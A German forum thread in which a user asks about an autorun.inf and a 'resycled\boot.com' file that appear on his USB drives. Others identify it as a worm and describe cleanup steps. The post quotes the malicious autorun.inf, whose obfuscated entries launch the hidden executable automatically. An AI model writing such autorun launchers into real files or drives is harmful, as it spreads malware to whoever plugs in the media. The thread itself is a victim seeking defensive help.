autorun auf Wechseldatenträger

  • geschlossen

  • BorNoe
  • 1048 Aufrufe 4 Antworten

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • autorun auf Wechseldatenträger

    gude,

    ich hab eig zwei probleme, einerseites erstellt mein pc auf jedem externen welchseldatenträger ne autorun.inf mit diesem inhalt:

    Quellcode

    1. [autorun]
    2. ;suzgcwjuldbbkbmbsmnmytssfwlvzvrpfjderionsk
    3. shellexecute="resycled\boot.com g:"
    4. ;akacejbhtuabcgfpqzinfdsekzysacdyrkydggbrdmxdltnetsystqouxkvsjchqqvc
    5. shell\Open\command="resycled\boot.com g:"
    6. ;bljfmrkrrpnnksdrtwmfxbeuomhpjullrxme
    7. shell=Open


    ich weiß nicht ob des bedenklich ist, ich denke mal es kommt durch einen virus o.ä.

    dazu wird auch der ordner resycled mit der boot.com datei erstellt

    ich weiß nicht was es mit den dateien auf sich hat, ich hoffe es kann mir jemand helfen


    zweitens is noch des problem, dass wenn ich übern arbeitsplatz ein laufwerk öffne, also mit doppelklick, öffnet der des immer in nem neuen fenster, is recht nervig, vll kann mir jemand verraten wie man des ausstellt

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von BorNoe ()

  • Probiers mal im Explorer / Arbeitsplatz mit Extras - Ordneroptionen - Allgemein - jeden Ordner im selben Fenster öffnen.

    Ansonsten würde ich mal die erstellte boot.com bei virustotal einschicken, damit du erst mal weißt was für ein Virus das ist, wenn ihn schon dein Antivirenprogramm nicht findet.

  • Meines Wissens nach ist das ein Virus.
    Der Virus nennt sich "Recycler", weil auf auf jeden Laufwerk so eine Autorun-Datei erstellt, die den Virus dann aufruft!

    Lösch den einfach mal und lass nen Virenscanner drüberlaufen ;)
    Dann is das Prob hoffentlich gelöst :D

    mfg
    Creed007

  • Hi!

    Scheint sich um so etwas in der Art zu handeln.

    Hier hatte jemand das gleiche Problem:
    Hi,

    die Infektion gibt sich häufig als Codec aus: Es wird Musik oder Videos angespielt und dann die Meldung eines fehlenden Codecs angezeigt. Der heruntergeladene Codec ist der Schädling. Er versucht aber auch Sicherheitslücken im Internet Explorer auszunutzen um sich zu installieren.


    So hat er es gelöst:
    1. mit Smitfraudfix eine Bereinigung durchführen
    2. die verbleibenden Dateien mit Avenger löschen
    3. die reg-Datei ausführen um die Verweise auf die gelöschten Dateien zu entfernen

    *die reg hab ich dir per PN geschickt

    mfg killer_duck99

  • killer_duck99 schrieb:

    Hi!

    Scheint sich um so etwas in der Art zu handeln.

    Hier hatte jemand das gleiche Problem:


    So hat er es gelöst:
    1. mit Smitfraudfix eine Bereinigung durchführen
    2. die verbleibenden Dateien mit Avenger löschen
    3. die reg-Datei ausführen um die Verweise auf die gelöschten Dateien zu entfernen

    *die reg hab ich dir per PN geschickt

    mfg killer_duck99


    danke für deine hilfe

    nun sind die dateien weg, das öffnen in nem neuen fenster hin wahrscheinlich auch mit der autorun zusammen

    danke euch nochma